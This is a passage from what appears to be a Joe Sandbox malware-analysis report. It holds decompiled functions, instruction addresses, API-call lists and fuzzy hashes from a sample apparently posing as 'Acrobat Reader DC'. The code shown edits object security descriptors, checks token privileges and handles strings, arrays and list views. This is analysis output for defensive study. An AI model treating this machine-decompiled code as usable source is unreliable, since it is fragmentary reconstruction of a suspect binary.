								_a8 = _t84;
								if(_t84 < 1) {
									continue;
								}
								_t116 = _v24;
								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
									_v5 = 1;
								}
								goto L20;
							}
							goto L20;
						}
						_t88 = _v52;
						if(_t88 == _t118) {
							goto L12;
						}
						_t117 = 0;
						if(_t88 <= _t118) {
							goto L12;
						}
						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
							_t117 = _t117 + 1;
							if(_t117 < _v52) {
								continue;
							}
							goto L12;
						}
					}
					goto L20;
				}
			}


























                                  0x00445f4d
                                  0x00445f4f
                                  0x00445f52
                                  0x00445f56
                                  0x00445f59
                                  0x00445f5c
                                  0x00445f5f
                                  0x00445f6d
                                  0x004460f7
                                  0x004460fb
                                  0x00446104
                                  0x0044610a
                                  0x00446110
                                  0x00446121
                                  0x00445f88
                                  0x00445f98
                                  0x00445fa3
                                  0x00000000
                                  0x00000000
                                  0x00445fb0
                                  0x00445fb5
                                  0x00445fb8
                                  0x00445fbb
                                  0x00445fc4
                                  0x00445fea
                                  0x00445ff3
                                  0x00445ff8
                                  0x00445ffd
                                  0x00000000
                                  0x00000000
                                  0x00446006
                                  0x0044604e
                                  0x00446058
                                  0x00446058
                                  0x00446061
                                  0x00446063
                                  0x00446068
                                  0x00000000
                                  0x00000000
                                  0x0044606e
                                  0x00446072
                                  0x00446077
                                  0x0044608a
                                  0x00000000
                                  0x00000000
                                  0x0044608f
                                  0x00446096
                                  0x00446099
                                  0x004460a1
                                  0x004460ae
                                  0x004460b1
                                  0x004460bc
                                  0x00000000
                                  0x00000000
                                  0x004460c1
                                  0x004460c2
                                  0x004460c5
                                  0x004460cb
                                  0x00000000
                                  0x00000000
                                  0x004460cd
                                  0x004460de
                                  0x004460f3
                                  0x004460f3
                                  0x00000000
                                  0x004460de
                                  0x00000000
                                  0x00446099
                                  0x00446008
                                  0x0044600d
                                  0x00000000
                                  0x00000000
                                  0x0044600f
                                  0x00446013
                                  0x00000000
                                  0x00000000
                                  0x00446015
                                  0x00446048
                                  0x0044604c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044604c
                                  0x00446015
                                  0x00000000
                                  0x00445fc4

                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
                                  • _memset.LIBCMT ref: 00445FB0
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
                                  • GetLengthSid.ADVAPI32(?), ref: 00445FE1
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
                                  • GetLengthSid.ADVAPI32(?), ref: 00446052
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
                                  • CopySid.ADVAPI32(00000000), ref: 00446082
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
                                  • SetUserObjectSecurity.USER32 ref: 004460E9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction ID: 246472a61925077f0ce062fd926fe76963597eff5ae69a3ad94d9fcadac7f974
                                  • Opcode Fuzzy Hash: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction Fuzzy Hash: FD51C0B1900209ABEB10DFA5DC84EEFB778AF49704F04C41EF515A7241D7B8E905CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433784(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v526;
				char _v528;
				char _v1052;
				char _v1574;
				char _v1576;
				char _v2100;
				char _v2624;
				char _v3148;
				char _v3672;
				char _v4196;
				void* __edi;
				void* __esi;
				void* _t38;
				char* _t53;
				void* _t61;
				intOrPtr _t81;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;

				_t61 = __ebx;
				E00422240(0x1060);
				_t82 = _a16;
				_t81 = _a20;
				_t38 = E00413E1F(_a16, 0x2a);
				_t85 = _t84 + 8;
				if(_t38 != 0) {
					E00413A0E(_a4,  &_v2100,  &_v3148,  &_v4196,  &_v528);
					E00413A0E(_t82,  &_v2100,  &_v3148,  &_v3672,  &_v1576);
					_t86 = _t85 + 0x28;
					if(_v528 == 0x2e) {
						E00411567( &_v528,  &_v526);
						_t86 = _t86 + 8;
					}
					if(_v1576 == 0x2e) {
						E00411567( &_v1576,  &_v1574);
						_t86 = _t86 + 8;
					}
					E00411567(_t81,  &_v2100);
					E00411536(_t81,  &_v3148);
					E004336C5(_t61,  &_v1576, _t81, 0x2e,  &_v528, _a12,  &_v1576,  &_v2624);
					E004336C5(_t61,  &_v4196, _t81, 0x2e,  &_v4196, _a8,  &_v3672,  &_v1052);
					_t87 = _t86 + 0x30;
					if(_v2624 == 0) {
						if(_v528 != 0) {
							E00411536( &_v1052, ".");
							_t53 =  &_v528;
							goto L10;
						}
					} else {
						E00411536( &_v1052, ".");
						_t53 =  &_v2624;
						L10:
						E00411536( &_v1052, _t53);
						_t87 = _t87 + 0x10;
					}
					return E00411536(_t81,  &_v1052);
				} else {
					return E00411567(_t81, _t82);
				}
			}























                                  0x00433784
                                  0x0043378c
                                  0x00433792
                                  0x00433796
                                  0x0043379c
                                  0x004337a1
                                  0x004337a6
                                  0x004337d8
                                  0x004337fa
                                  0x00433804
                                  0x0043380e
                                  0x0043381e
                                  0x00433823
                                  0x00433823
                                  0x0043382d
                                  0x0043383d
                                  0x00433842
                                  0x00433842
                                  0x0043384d
                                  0x0043385a
                                  0x00433878
                                  0x00433896
                                  0x0043389b
                                  0x004338a6
                                  0x004338c9
                                  0x004338d7
                                  0x004338dc
                                  0x00000000
                                  0x004338dc
                                  0x004338a8
                                  0x004338b4
                                  0x004338b9
                                  0x004338e2
                                  0x004338ea
                                  0x004338ef
                                  0x004338ef
                                  0x00433907
                                  0x004337a8
                                  0x004337b7
                                  0x004337b7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436F47 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00436F47() {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				WCHAR* _v24;
				struct _LUID _v32;
				char _v36;
				struct _LUID _v44;
				void* _t32;
				void* _t39;
				void* _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				void* _t58;
				void* _t59;

				_t54 = 0;
				_v8 = 0;
				_v12 = 0;
				_t45 = 0;
				_v20 = 0;
				if(OpenThreadToken(GetCurrentProcess(), 8, 0,  &_v8) != 0 || OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					if(E00436BC5(_v8,  &_v12,  &_v20) == 0 || LookupPrivilegeValueW(0, L"SeAssignPrimaryTokenPrivilege",  &_v44) == 0) {
						L17:
						_t54 = _v12;
					} else {
						_v36 = 0;
						if(LookupPrivilegeValueW(0, L"SeIncreaseQuotaPrivilege",  &_v32) == 0) {
							goto L17;
						} else {
							_v24 = 0;
							_t54 = _v12;
							_t58 = 0;
							if( *_t54 > 0) {
								_v12 = _t54 + 4;
								do {
									_t46 =  &_v36;
									_v16 = 2;
									do {
										_t41 = E004119E3(_v12, _t46 - 8, 8);
										_t59 = _t59 + 0xc;
										if(_t41 == 0) {
											 *_t46 = 1;
										}
										_t46 = _t46 + 0xc;
										_t20 =  &_v16;
										 *_t20 = _v16 - 1;
									} while ( *_t20 != 0);
									_v12 = _v12 + 0xc;
									_t58 = _t58 + 1;
								} while (_t58 <  *_t54);
							}
							_t45 = 1;
							_t39 = 0;
							_t48 =  &_v36;
							while( *_t48 != 0) {
								_t39 = _t39 + 1;
								_t48 = _t48 + 0xc;
								if(_t39 < 2) {
									continue;
								} else {
								}
								goto L18;
							}
							_t45 = 0;
						}
					}
				}
				L18:
				_t32 = _v8;
				if(_t32 != 0) {
					CloseHandle(_t32);
				}
				E00436BA9(_t54);
				return _t45;
			}




















                                  0x00436f56
                                  0x00436f5f
                                  0x00436f62
                                  0x00436f65
                                  0x00436f67
                                  0x00436f75
                                  0x00436fa1
                                  0x00437040
                                  0x00437040
                                  0x00436fc3
                                  0x00436fcd
                                  0x00436fd4
                                  0x00000000
                                  0x00436fd6
                                  0x00436fd6
                                  0x00436fd9
                                  0x00436fdc
                                  0x00436fe0
                                  0x00436fe5
                                  0x00436fe8
                                  0x00436fe8
                                  0x00436feb
                                  0x00436ff7
                                  0x00437001
                                  0x00437006
                                  0x00437010
                                  0x00437012
                                  0x00437012
                                  0x00437014
                                  0x00437017
                                  0x00437017
                                  0x00437017
                                  0x0043701c
                                  0x00437020
                                  0x00437021
                                  0x00436fe8
                                  0x00437025
                                  0x00437027
                                  0x00437029
                                  0x0043702c
                                  0x00437031
                                  0x00437032
                                  0x00437038
                                  0x00000000
                                  0x00000000
                                  0x0043703a
                                  0x00000000
                                  0x00437038
                                  0x0043703c
                                  0x0043703c
                                  0x00436fd4
                                  0x00436fa1
                                  0x00437043
                                  0x00437043
                                  0x00437048
                                  0x0043704b
                                  0x0043704b
                                  0x00437052
                                  0x00437062

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                  • _memcmp.LIBCMT ref: 00437001
                                  • CloseHandle.KERNEL32(?), ref: 0043704B
                                  Strings
                                  • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                  • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                  • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                  • API String ID: 1446985595-805462909
                                  • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
                                  • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448123 Relevance: 16.7, APIs: 11, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448123(void* __eflags, intOrPtr _a4, signed short _a8, char _a12, signed int _a16) {
				int _v8;
				signed char _v12;
				intOrPtr _v16;
				long _v20;
				signed short _v28;
				intOrPtr _v32;
				long _v40;
				long _v52;
				long _v56;
				void* _v60;
				void* _v8252;
				intOrPtr _t79;
				long _t81;
				long _t85;
				long _t89;
				intOrPtr _t92;
				long _t95;
				signed short _t99;
				long _t101;
				signed int _t105;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t114;
				intOrPtr _t116;
				signed short _t121;
				intOrPtr _t129;
				intOrPtr _t135;
				struct HWND__* _t140;

				E00422240(0x203c);
				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_t107 =  *0x4a8690; // 0x0
					_t108 =  *0x4a86a4; // 0xa71980
					_t105 = _v8;
					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + _a16 * 4))));
					_t140 =  *( *( *(_t108 + _t105 * 4)));
					_t79 = _a4;
					 *(_t79 + 0x30) = _t140;
					_t109 =  *0x4a86a4; // 0xa71980
					 *((char*)(_t79 + 0x8b)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + _t105 * 4)))) + 0x8b));
					_t81 = SendMessageW(SendMessageW(_t140, 0x101f, 0, 0), 0x1200, 0, 0);
					 *(_a4 + 0x8c) = _t81;
					_t129 =  *0x4a86a4; // 0xa71980
					_v20 = _t81;
					 *( *((intOrPtr*)( *((intOrPtr*)(_t129 + _t105 * 4)))) + 0x8c) = _t81;
					_v12 = GetWindowLongW(_t140, 0xfffffff0);
					E00412F40( &_v60, 0, 0x28);
					_t85 = SendMessageW(_t140, 0x1004, 0, 0);
					 *(_a4 + 0x80) = _t85;
					_t114 =  *0x4a86a4; // 0xa71980
					_v60 = 7;
					_v32 = 0xfffffffe;
					_t116 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + _t105 * 4)))) + 0x94));
					_a16 = 1;
					_t145 = _t116 - 0xffffffff;
					if(_t116 > 0xffffffff) {
						_v32 = _t116;
					}
					_v56 = _t85;
					_v40 =  &_v8252;
					_v28 = _a8;
					_v52 = 0;
					E00430626(_t145,  &_v8252,  &_a12, 0x4a8644);
					_t89 = SendMessageW(_t140, 0x104d, 0,  &_v60);
					_v8 = _t89;
					_t146 = _t89 - 0xffffffff;
					if(_t89 == 0xffffffff) {
						goto L15;
					} else {
						while(E00430626(_t146,  &_v8252,  &_a12, 0x4a8644) != 0) {
							_t95 = _a16;
							_v52 = _t95;
							if(_t95 > _v20) {
								SendMessageW(_t140, 0x1008, _v8,  &_v60);
								goto L15;
							} else {
								if(_v8252 == 0 || SendMessageW(_t140, 0x1074, _v8,  &_v60) != 0) {
									if((_v12 & 0x00000001) != 0) {
										_t99 = SendMessageW(_t140, 0x1057, 0,  &_v8252) + 0xc;
										_a8 = _t99;
										if(_t99 > 0x96) {
											_a8 = 0x96;
										}
										_t101 = SendMessageW(_t140, 0x101d, _a16, 0);
										_t121 = _a8;
										_t146 = _t101 - _t121;
										if(_t101 <= _t121) {
											SendMessageW(_t140, 0x101e, _a16, _t121 & 0x0000ffff);
										}
									}
									_a16 = _a16 + 1;
									continue;
								} else {
									goto L15;
								}
							}
							goto L19;
						}
						_t135 = _a4;
						__eflags =  *((char*)(_t135 + 0x8b)) - 0xff;
						if( *((char*)(_t135 + 0x8b)) != 0xff) {
							_t92 =  *0x4a86a4; // 0xa71980
							E00430B87(_v16,  *((intOrPtr*)( *((intOrPtr*)(_t92 + _t105 * 4)))), 1);
						}
						return 1;
					}
				}
				L19:
			}
































                                  0x0044812b
                                  0x0044814b
                                  0x00448322
                                  0x00448322
                                  0x0044832a
                                  0x00448151
                                  0x00448151
                                  0x0044815f
                                  0x00448165
                                  0x00448173
                                  0x00448178
                                  0x0044817a
                                  0x0044817f
                                  0x00448182
                                  0x004481a2
                                  0x004481ab
                                  0x004481b0
                                  0x004481b7
                                  0x004481c5
                                  0x004481c8
                                  0x004481d7
                                  0x004481e0
                                  0x004481f2
                                  0x004481fa
                                  0x00448201
                                  0x00448207
                                  0x0044820e
                                  0x0044821d
                                  0x00448223
                                  0x0044822a
                                  0x0044822d
                                  0x0044822f
                                  0x0044822f
                                  0x00448240
                                  0x00448248
                                  0x0044824b
                                  0x0044824e
                                  0x00448255
                                  0x00448266
                                  0x00448268
                                  0x0044826b
                                  0x0044826e
                                  0x00000000
                                  0x00448274
                                  0x00448274
                                  0x00448291
                                  0x00448294
                                  0x0044829a
                                  0x00448320
                                  0x00000000
                                  0x0044829c
                                  0x004482a4
                                  0x004482be
                                  0x004482d1
                                  0x004482d4
                                  0x004482dc
                                  0x004482de
                                  0x004482de
                                  0x004482f1
                                  0x004482f3
                                  0x004482f6
                                  0x004482f8
                                  0x00448308
                                  0x00448308
                                  0x004482f8
                                  0x0044830a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004482a4
                                  0x00000000
                                  0x0044829a
                                  0x0044832d
                                  0x00448330
                                  0x00448337
                                  0x00448339
                                  0x0044834a
                                  0x0044834a
                                  0x00448357
                                  0x00448357
                                  0x0044826e
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                  • _memset.LIBCMT ref: 004481E0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow_memset
                                  • String ID:
                                  • API String ID: 830647256-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00479362(void* __eflags, void* __fp0, char _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t58;
				intOrPtr _t61;
				char* _t62;
				signed int _t94;
				void* _t102;
				void* _t103;
				intOrPtr _t104;
				signed int _t108;
				signed int _t111;
				void* _t112;
				void* _t123;

				_t123 = __fp0;
				_t58 = E004323E1( &_a4, 0);
				_t102 = _t58;
				__imp__#41(0xc, _t102,  &_v8);
				if(_t58 < 0) {
					L13:
					E00408F40(_t102,  &_a4);
					return 0;
				} else {
					_t94 = 0;
					if(_t102 > 0) {
						do {
							_t4 = _t94 + 1; // 0x1
							_t111 = _t4;
							 *((intOrPtr*)(_v8 + 0x14 + _t94 * 8)) = 0;
							 *((intOrPtr*)(_v8 + 0x10 + _t94 * 8)) = E004323E1( &_a4, _t111);
							_t94 = _t111;
						} while (_t94 < _t102);
					}
					_t61 = _v8;
					 *((short*)(_t61 + 2)) = 0x880;
					 *((intOrPtr*)(_v8 + 4)) = 0x10;
					__imp__#37(_v8);
					if(_t61 < 0) {
						__imp__#38(_v8);
						goto L13;
					} else {
						_t62 =  &_v36;
						__imp__#8(_t62);
						_v28 = 0;
						_v24 = 0;
						_v52 = 0;
						_v44 = 1;
						_v40 = 0;
						__imp__#23(_v8,  &_v16);
						if(_t62 < 0) {
							__imp__#39(_v8);
							__imp__#38(_v8);
							E00408F40(_t102,  &_v52);
							__imp__#9( &_v36);
							E00408F40(_t102,  &_a4);
							return 0;
						} else {
							_v12 = _v16;
							E00408E80( &_v52,  &_a4,  &_a4);
							_t103 = E00479230( &_a4,  &_v52,  &_v20);
							_t108 = 0;
							if(_t103 > 0) {
								_t91 = _v12;
								do {
									_t75 = _v20;
									if( *((intOrPtr*)(_v20 + _t108 * 4)) != 0) {
										_t112 = _t112 - 0x10;
										E0040B960( *((intOrPtr*)(_t75 + _t108 * 4)), _t112, _t91, _t103);
										E00470E55(_t91, _t103, _t123);
										_t91 = _v12;
										__imp__#10(_v12,  &_v36,  &_v36);
									}
									_v12 = _v12 + 0x10;
									_t108 = _t108 + 1;
								} while (_t108 < _t103);
							}
							__imp__#24(_v8);
							_t104 = _v8;
							E00408F40(_t104,  &_v52);
							__imp__#9( &_v36);
							_v28 = 0;
							_v24 = 0;
							E00408F40(_t104,  &_a4);
							return _t104;
						}
					}
				}
			}



























                                  0x00479362
                                  0x00479372
                                  0x0047937b
                                  0x00479380
                                  0x00479388
                                  0x004794ed
                                  0x004794f0
                                  0x004794fd
                                  0x0047938e
                                  0x0047938e
                                  0x00479392
                                  0x00479394
                                  0x00479397
                                  0x00479397
                                  0x0047939f
                                  0x004793ab
                                  0x004793af
                                  0x004793b1
                                  0x00479394
                                  0x004793b5
                                  0x004793bd
                                  0x004793c4
                                  0x004793cf
                                  0x004793d7
                                  0x004794e7
                                  0x00000000
                                  0x004793dd
                                  0x004793dd
                                  0x004793e1
                                  0x004793ef
                                  0x004793f2
                                  0x004793f5
                                  0x004793f8
                                  0x004793ff
                                  0x00479402
                                  0x0047940a
                                  0x004794ae
                                  0x004794b8
                                  0x004794c1
                                  0x004794ca
                                  0x004794d3
                                  0x004794e0
                                  0x00479410
                                  0x0047941a
                                  0x0047941d
                                  0x0047942c
                                  0x0047942e
                                  0x00479432
                                  0x00479434
                                  0x0047943a
                                  0x0047943a
                                  0x00479441
                                  0x00479446
                                  0x0047944b
                                  0x00479454
                                  0x00479459
                                  0x00479461
                                  0x00479461
                                  0x00479467
                                  0x0047946b
                                  0x0047946c
                                  0x0047943a
                                  0x00479474
                                  0x0047947a
                                  0x00479480
                                  0x00479489
                                  0x00479494
                                  0x00479497
                                  0x0047949a
                                  0x004794a7
                                  0x004794a7
                                  0x0047940a
                                  0x004793d7

                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
